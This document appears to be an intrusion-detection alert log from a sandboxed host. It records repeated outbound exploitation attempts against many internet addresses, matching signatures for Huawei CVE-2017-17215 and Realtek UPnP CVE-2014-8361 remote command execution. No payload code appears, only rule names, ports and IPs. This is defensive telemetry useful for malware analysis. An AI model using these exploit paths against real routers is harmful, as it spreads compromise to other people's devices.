                                                07/20/24-23:05:45.435096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016837215192.168.2.1441.103.52.46
                                                07/20/24-23:05:45.460569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169837215192.168.2.14197.48.23.182
                                                07/20/24-23:05:40.486123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24635052869192.168.2.1418.89.154.147
                                                07/20/24-23:05:59.457721TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3611452869192.168.2.14117.112.92.46
                                                07/20/24-23:05:34.656192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917037215192.168.2.1457.147.31.177
                                                07/20/24-23:06:21.718589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24220852869192.168.2.14150.55.177.42
                                                07/20/24-23:06:35.192069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712237215192.168.2.1441.172.218.214
                                                07/20/24-23:05:35.732603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5635852869192.168.2.14143.50.74.208
                                                07/20/24-23:05:38.951134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6026037215192.168.2.1489.107.222.198
                                                07/20/24-23:05:46.427946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3441052869192.168.2.14184.129.35.32
                                                07/20/24-23:05:33.862992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249437215192.168.2.14216.204.37.61
                                                07/20/24-23:05:38.517434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5407252869192.168.2.14152.153.83.132
                                                07/20/24-23:05:59.426493TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23923452869192.168.2.1418.34.122.251
                                                07/20/24-23:06:12.532321TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613814852869192.168.2.1487.122.32.138
                                                07/20/24-23:06:20.550859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4258252869192.168.2.14147.137.69.216
                                                07/20/24-23:05:40.347403TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24755652869192.168.2.14153.164.18.4
                                                07/20/24-23:07:08.228937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614409452869192.168.2.1451.66.202.30
                                                07/20/24-23:05:50.510455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769437215192.168.2.1441.192.149.224
                                                07/20/24-23:05:39.319180TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4168052869192.168.2.14159.171.10.238
                                                07/20/24-23:05:57.558741TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614403652869192.168.2.14193.17.40.179
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4389437215192.168.2.14102.245.159.117
                                                07/20/24-23:06:01.896425TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614532252869192.168.2.14220.38.3.62
                                                07/20/24-23:05:33.857158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816037215192.168.2.14197.90.229.28
                                                07/20/24-23:05:48.026941TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4996852869192.168.2.1465.189.243.195
                                                07/20/24-23:06:50.028546TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23302252869192.168.2.14155.136.119.1
                                                07/20/24-23:06:03.367262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5181437215192.168.2.14157.90.15.78
                                                07/20/24-23:06:04.023969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4854452869192.168.2.14119.215.194.1
                                                07/20/24-23:06:15.664506TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23968452869192.168.2.1440.175.52.158
                                                07/20/24-23:05:52.503773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24579052869192.168.2.1461.177.161.149
                                                07/20/24-23:06:31.047147TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25101052869192.168.2.14160.32.94.148
                                                07/20/24-23:05:37.997517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631452869192.168.2.1447.104.234.54
                                                07/20/24-23:06:01.225424TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23539252869192.168.2.1496.223.224.178
                                                07/20/24-23:06:47.557250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24062852869192.168.2.1443.154.190.50
                                                07/20/24-23:05:58.905764TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5929252869192.168.2.14191.41.212.93
                                                07/20/24-23:06:01.391419TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5529452869192.168.2.1444.160.30.244
                                                07/20/24-23:05:39.685214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866637215192.168.2.14157.44.139.24
                                                07/20/24-23:05:57.342606TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5279052869192.168.2.14169.95.16.220
                                                07/20/24-23:07:06.736138TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4172252869192.168.2.14172.186.38.12
                                                07/20/24-23:05:52.551649TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24336652869192.168.2.14175.68.43.201
                                                07/20/24-23:05:59.436745TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614146252869192.168.2.1431.38.158.120
                                                07/20/24-23:06:00.114628TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613397252869192.168.2.14147.246.160.90
                                                07/20/24-23:05:59.834038TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613788252869192.168.2.1418.183.102.66
                                                07/20/24-23:05:40.344189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24167452869192.168.2.1431.43.154.194
                                                07/20/24-23:05:44.314691TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4818052869192.168.2.14185.227.212.222
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626037215192.168.2.14157.161.247.51
                                                07/20/24-23:06:07.406980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4204852869192.168.2.1481.135.180.241
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997837215192.168.2.1460.223.161.219
                                                07/20/24-23:05:38.657431TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615466252869192.168.2.1462.112.120.41
                                                07/20/24-23:07:32.121311TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3956452869192.168.2.1469.155.223.182
                                                07/20/24-23:05:36.528872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158237215192.168.2.1447.179.50.213
                                                07/20/24-23:05:47.105578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.14197.212.70.117
                                                07/20/24-23:06:44.210907TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613928252869192.168.2.14216.73.223.205
                                                07/20/24-23:05:35.945542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3896652869192.168.2.14109.170.180.65
                                                07/20/24-23:05:58.216480TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4467052869192.168.2.14170.88.190.122
                                                07/20/24-23:06:27.576162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5351052869192.168.2.14138.202.243.55
                                                07/20/24-23:05:59.335445TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615927652869192.168.2.14169.23.32.227
                                                07/20/24-23:05:52.466707TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24883252869192.168.2.14126.177.224.75
                                                07/20/24-23:06:38.067768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24338452869192.168.2.1457.62.122.118
                                                07/20/24-23:05:33.855567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454237215192.168.2.1441.103.45.78
                                                07/20/24-23:05:52.539655TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24380852869192.168.2.1434.35.146.155
                                                07/20/24-23:05:56.036527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582037215192.168.2.14196.42.232.134
                                                07/20/24-23:06:06.291744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25971852869192.168.2.1438.86.172.217
                                                07/20/24-23:06:15.061851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4334852869192.168.2.1470.151.190.95
                                                07/20/24-23:06:31.841865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5689852869192.168.2.14165.146.142.120
                                                07/20/24-23:05:37.454499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3595452869192.168.2.14117.129.252.99
                                                07/20/24-23:05:44.341577TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613288052869192.168.2.1485.190.99.234
                                                07/20/24-23:06:38.097414TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614565652869192.168.2.14160.160.125.122
                                                07/20/24-23:05:35.297940TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615954452869192.168.2.1419.97.179.204
                                                07/20/24-23:05:57.874102TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24251852869192.168.2.14103.66.18.174
                                                07/20/24-23:06:25.857963TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615683852869192.168.2.144.205.240.59
                                                07/20/24-23:05:57.844842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614091652869192.168.2.1440.70.128.177
                                                07/20/24-23:06:00.516920TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25805652869192.168.2.1414.19.59.241
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3859237215192.168.2.1441.170.167.228
                                                07/20/24-23:05:52.544570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25196052869192.168.2.14137.251.110.201
                                                07/20/24-23:05:47.101729TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515837215192.168.2.14157.42.35.121
                                                07/20/24-23:05:48.801547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5799037215192.168.2.14197.117.178.198
                                                07/20/24-23:05:36.438620TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3667252869192.168.2.14211.88.161.89
                                                07/20/24-23:05:58.972089TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25758052869192.168.2.14139.91.195.69
                                                07/20/24-23:05:37.441224TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23853852869192.168.2.14184.192.255.233
                                                07/20/24-23:06:24.662240TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3680852869192.168.2.1495.76.201.76
                                                07/20/24-23:05:59.119232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5131452869192.168.2.14186.26.42.76
                                                07/20/24-23:06:18.458631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3378852869192.168.2.14109.168.44.251
                                                07/20/24-23:05:48.767395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192237215192.168.2.14197.41.47.111
                                                07/20/24-23:05:59.335445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24568052869192.168.2.14175.170.231.7
                                                07/20/24-23:06:21.143883TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3606452869192.168.2.14154.27.63.24
                                                07/20/24-23:05:35.938951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613467452869192.168.2.14146.54.174.109
                                                07/20/24-23:05:56.807816TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4905052869192.168.2.1459.6.13.116
                                                07/20/24-23:05:46.257528TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3863652869192.168.2.14107.0.137.66
                                                07/20/24-23:05:52.494675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24961652869192.168.2.1420.92.193.38
                                                07/20/24-23:06:07.761612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4251852869192.168.2.1417.191.215.191
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.14197.161.202.18
                                                07/20/24-23:05:58.237933TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614026852869192.168.2.1466.132.67.191
                                                07/20/24-23:06:02.976833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3329452869192.168.2.1418.150.67.241
                                                07/20/24-23:05:40.338978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5596252869192.168.2.1462.112.120.41
                                                07/20/24-23:05:57.457796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5626852869192.168.2.1484.76.117.61
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938637215192.168.2.14157.32.82.175
                                                07/20/24-23:05:35.441643TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614493852869192.168.2.14120.181.185.117
                                                07/20/24-23:06:01.903875TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5579652869192.168.2.14169.21.93.225
                                                07/20/24-23:05:57.009321TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613451852869192.168.2.14220.246.104.60
                                                07/20/24-23:05:37.476343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5906252869192.168.2.14119.225.48.58
                                                07/20/24-23:06:26.155233TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613385452869192.168.2.1476.98.41.108
                                                07/20/24-23:05:57.180627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4850652869192.168.2.14140.124.136.34
                                                07/20/24-23:05:57.134757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615712652869192.168.2.14108.121.255.112
                                                07/20/24-23:05:46.835672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3888052869192.168.2.14219.239.208.112
                                                07/20/24-23:05:59.417612TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615674252869192.168.2.14130.122.247.240
                                                07/20/24-23:06:17.683294TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4548452869192.168.2.14113.10.3.85
                                                07/20/24-23:06:05.073224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4924052869192.168.2.1486.5.139.220
                                                07/20/24-23:05:39.795410TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615037652869192.168.2.1479.209.117.180
                                                07/20/24-23:05:59.236975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615734852869192.168.2.14144.12.181.130
                                                07/20/24-23:05:50.498027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427237215192.168.2.14157.40.99.163
                                                07/20/24-23:05:59.316014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3307052869192.168.2.14107.221.240.37
                                                07/20/24-23:05:35.966789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3753252869192.168.2.14145.195.83.181
                                                07/20/24-23:05:52.554950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25583852869192.168.2.1413.4.78.44
                                                07/20/24-23:05:58.972089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6034452869192.168.2.1486.91.56.112
                                                07/20/24-23:06:29.161519TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613307252869192.168.2.1496.169.149.57
                                                07/20/24-23:05:40.423413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4108452869192.168.2.1418.146.210.210
                                                07/20/24-23:05:40.486123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25318652869192.168.2.1471.187.255.160
                                                07/20/24-23:05:36.592874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301837215192.168.2.1486.52.82.145
                                                07/20/24-23:06:00.927462TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23328852869192.168.2.14140.82.127.22
                                                07/20/24-23:06:18.458632TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614822852869192.168.2.14168.176.14.101
                                                07/20/24-23:06:42.090394TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4962852869192.168.2.1449.124.39.191
                                                07/20/24-23:05:34.627949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4682637215192.168.2.14197.113.224.94
                                                07/20/24-23:06:10.529848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3447052869192.168.2.1435.248.92.7
                                                07/20/24-23:05:57.797060TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4011852869192.168.2.14147.107.44.253
                                                07/20/24-23:05:58.084343TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613925252869192.168.2.14182.199.230.99
                                                07/20/24-23:05:52.493809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24553052869192.168.2.1473.191.176.248
                                                07/20/24-23:06:11.328788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5824052869192.168.2.1442.74.229.86
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342637215192.168.2.1441.0.19.209
                                                07/20/24-23:05:59.482880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3366052869192.168.2.14113.35.97.192
                                                07/20/24-23:05:42.143657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577237215192.168.2.148.141.189.185
                                                07/20/24-23:05:45.460569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137237215192.168.2.14197.75.75.225
                                                07/20/24-23:05:50.557201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556837215192.168.2.14167.49.186.162
                                                07/20/24-23:05:58.549030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4828452869192.168.2.14164.70.124.204
                                                07/20/24-23:05:47.101729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772837215192.168.2.1441.209.183.81
                                                07/20/24-23:05:47.371087TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4358452869192.168.2.1473.191.176.248
                                                07/20/24-23:06:54.833146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928252869192.168.2.149.221.109.93
                                                07/20/24-23:05:36.325773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430237215192.168.2.14197.168.71.172
                                                07/20/24-23:05:57.865744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24402852869192.168.2.14199.88.11.180
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659037215192.168.2.1441.126.201.81
                                                07/20/24-23:05:56.994181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5859052869192.168.2.14183.63.189.195
                                                07/20/24-23:05:58.787162TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614992652869192.168.2.1494.49.228.97
                                                07/20/24-23:06:29.715968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25835052869192.168.2.14115.192.236.13
                                                07/20/24-23:05:39.945161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4108652869192.168.2.14171.254.202.145
                                                07/20/24-23:06:06.107643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25298252869192.168.2.14193.57.224.82
                                                07/20/24-23:06:21.994838TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5624852869192.168.2.1490.91.198.115
                                                07/20/24-23:07:07.975226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5169052869192.168.2.14189.26.184.105
                                                07/20/24-23:05:56.297302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335837215192.168.2.14197.76.154.181
                                                07/20/24-23:05:52.444445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5266052869192.168.2.1499.53.49.224
                                                07/20/24-23:07:21.395373TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3782652869192.168.2.14147.248.169.35
                                                07/20/24-23:06:05.124335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4900252869192.168.2.14156.92.82.212
                                                07/20/24-23:05:56.048573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852637215192.168.2.14157.84.136.93
                                                07/20/24-23:06:18.501276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4862252869192.168.2.14166.249.41.209
                                                07/20/24-23:05:36.323623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439237215192.168.2.1472.99.99.186
                                                07/20/24-23:06:32.673677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615051252869192.168.2.1453.178.251.121
                                                07/20/24-23:06:08.993749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113837215192.168.2.14197.194.101.97
                                                07/20/24-23:06:00.139140TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24335652869192.168.2.1420.84.196.35
                                                07/20/24-23:05:48.780090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632437215192.168.2.14157.176.82.211
                                                07/20/24-23:06:11.296188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344252869192.168.2.14134.6.131.96
                                                07/20/24-23:05:40.326250TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24645652869192.168.2.1493.126.173.161
                                                07/20/24-23:05:40.446932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3744052869192.168.2.14136.196.140.175
                                                07/20/24-23:05:42.143657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925237215192.168.2.14157.213.223.4
                                                07/20/24-23:05:59.983796TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25004052869192.168.2.1462.163.164.84
                                                07/20/24-23:05:40.483611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24529052869192.168.2.14110.4.207.154
                                                07/20/24-23:05:52.682403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5759652869192.168.2.1444.18.231.106
                                                07/20/24-23:05:59.996045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615034452869192.168.2.14138.239.248.75
                                                07/20/24-23:05:33.861759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955037215192.168.2.14157.83.28.229
                                                07/20/24-23:05:39.120890TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615887652869192.168.2.14128.15.34.80
                                                07/20/24-23:05:52.444444TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23744252869192.168.2.14212.82.101.165
                                                07/20/24-23:05:46.338516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3934852869192.168.2.1498.131.72.180
                                                07/20/24-23:05:48.800446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719437215192.168.2.14197.73.33.62
                                                07/20/24-23:05:58.830981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4093052869192.168.2.14121.138.29.115
                                                07/20/24-23:06:00.143129TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615436052869192.168.2.14109.93.236.93
                                                07/20/24-23:05:57.575004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614030252869192.168.2.14191.73.229.109
                                                07/20/24-23:06:24.516178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613414052869192.168.2.1471.238.208.128
                                                07/20/24-23:05:37.648285TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24931252869192.168.2.1468.40.200.159
                                                07/20/24-23:05:59.205784TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25337252869192.168.2.14198.211.160.55
                                                07/20/24-23:06:03.593241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615987252869192.168.2.1464.186.245.47
                                                07/20/24-23:05:59.413785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4054852869192.168.2.1450.48.189.161
